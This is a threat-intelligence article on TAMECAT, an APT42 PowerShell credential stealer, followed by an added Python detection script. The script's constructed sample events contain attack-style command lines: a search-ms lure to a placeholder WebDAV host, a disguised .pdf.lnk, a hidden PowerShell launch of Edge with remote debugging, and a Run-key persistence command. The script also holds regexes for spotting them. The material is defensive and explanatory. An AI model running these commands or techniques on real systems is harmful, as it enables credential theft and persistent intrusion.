TAMECAT, a sophisticated PowerShell-based malware that steals login credentials stored in the Microsoft Edge and Chrome browsers, has become a serious threat to enterprise security. The Iranian state-sponsored cyber-espionage group APT42, which has been actively targeting high-value senior defense and government officials worldwide, uses this malware in its espionage campaigns.

The threat demonstrates advanced capabilities in credential theft, data exfiltration, and persistent access to compromised systems. TAMECAT's multi-stage infection process begins with social engineering: the attackers, posing as trusted WhatsApp contacts, send victims malicious links that abuse the search-ms URI protocol handler.

Once activated, the malware downloads a VBScript that checks which antivirus product is present on the target system and chooses its execution path accordingly.

Details of TAMECAT's capabilities (Source: Pulsedive)

This preliminary reconnaissance lets the malware adapt its deployment strategy to the security environment it encounters. Pulsedive threat researchers found that TAMECAT uses a variety of command-and-control channels, including Firebase, Discord, Telegram bots, and Cloudflare Workers infrastructure.

Because of its modular design, the malware can download additional PowerShell scripts and run different commands remotely. Each module has a distinct function, from screen capture and file-system crawling to browser credential extraction, which makes it a complete surveillance tool. The threat actors behind TAMECAT use WebDAV servers to distribute malicious LNK files that pose as PDF documents.

TAMECAT was downloaded using VBScript (Source: Pulsedive)

When executed, these files start a chain of actions that establishes persistence via registry Run keys and logon scripts. The malware communicates with its command-and-control infrastructure over encrypted channels, protecting stolen data in transit with AES encryption using predefined keys.

This layered approach to obfuscation makes detection much harder for traditional security tools.

Browser Credential Extraction Mechanism

TAMECAT uses advanced methods to retrieve login credentials from Chrome and Microsoft Edge. For Edge, the malware uses the browser's remote debugging feature to access browser data while the application is running. For Chrome, TAMECAT temporarily suspends the browser process to gain unrestricted access to the stored credential databases.

The decoded Borjol function (Source: Pulsedive)

This dual-capability strategy lets the malware extract sensitive authentication data regardless of the victim's preferred browser. Because the credential extraction module runs entirely in memory, it leaves very few forensic traces on the compromised system.

Code executed in response to the C2 server's reply (Source: Pulsedive)

After credentials are gathered, TAMECAT splits the stolen data into smaller chunks and exfiltrates it using its Download Module and a specialized DLL component called Runs.dll.

This segmentation technique helps the malware evade detection by network monitoring tools. To provide redundancy in case one communication path is blocked or monitored, the exfiltration process uses multiple channels simultaneously, including FTP and HTTPS.
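Detection logic for the behaviours described above (the search-ms link, the LNK posing as a PDF served from WebDAV, Run-key persistence, and Edge started with remote debugging), as an added example that is not from the Pulsedive report or this article. It assumes remote debugging is enabled through Chromium's documented --remote-debugging-port switch and runs over constructed Sysmon-style process-creation events, not real telemetry; hosts and paths are placeholders.

```python
import re

# Constructed process-creation events, not real telemetry. Each entry is
# "parent_image|image|command_line"; 203.0.113.5 and the paths are placeholders.
SAMPLE_EVENTS = [
    r"msedge.exe|explorer.exe|explorer.exe search-ms:query=report&crumb=location:\\203.0.113.5@80\DavWWWRoot",
    r"explorer.exe|cmd.exe|cmd.exe /c \\203.0.113.5@80\DavWWWRoot\invoice.pdf.lnk",
    r"wscript.exe|powershell.exe|powershell.exe -w hidden -c start-process msedge.exe -ArgumentList '--remote-debugging-port=9222 --headless'",
    r"powershell.exe|reg.exe|reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\u\svc.vbs",
    r"explorer.exe|msedge.exe|msedge.exe https://example.com/",  # benign control
]

RULES = [
    # (tag, regex over the command line, optional regex over the image name)
    # search-ms handler pointed at a remote WebDAV share (\\host@port\...)
    ("search-ms-uri-from-unc", re.compile(r"search-ms:.*\\\\\d+\.\d+\.\d+\.\d+@\d+", re.I), None),
    # LNK with a double extension launched from a UNC path
    ("lnk-masquerading-as-pdf", re.compile(r"\\\\[^ ]+\\[^ ]+\.pdf\.lnk", re.I), None),
    # Chromium browser started with the remote-debugging switch
    ("browser-remote-debugging", re.compile(r"(msedge|chrome)(\.exe)?.*--remote-debugging-port=\d+", re.I), None),
    # reg.exe writing under the per-user or machine Run key
    ("run-key-persistence", re.compile(r"\\CurrentVersion\\Run\b", re.I), re.compile(r"^reg\.exe$", re.I)),
]


def classify_event(event: str) -> list:
    """Return the rule tags matched by one 'parent|image|cmdline' event."""
    _parent, image, cmdline = event.split("|", 2)
    tags = []
    for tag, cmd_re, image_re in RULES:
        if image_re is not None and not image_re.search(image):
            continue  # rule is scoped to a specific image name
        if cmd_re.search(cmdline):
            tags.append(tag)
    return tags


def scan(events) -> dict:
    """Map event index to matched tags, dropping events that match nothing."""
    hits = {}
    for i, event in enumerate(events):
        tags = classify_event(event)
        if tags:
            hits[i] = tags
    return hits


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(i, tags)
```

Each rule flags one stage of the chain; correlating two or more tags on the same host within a short window gives a higher-confidence alert than any single match.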
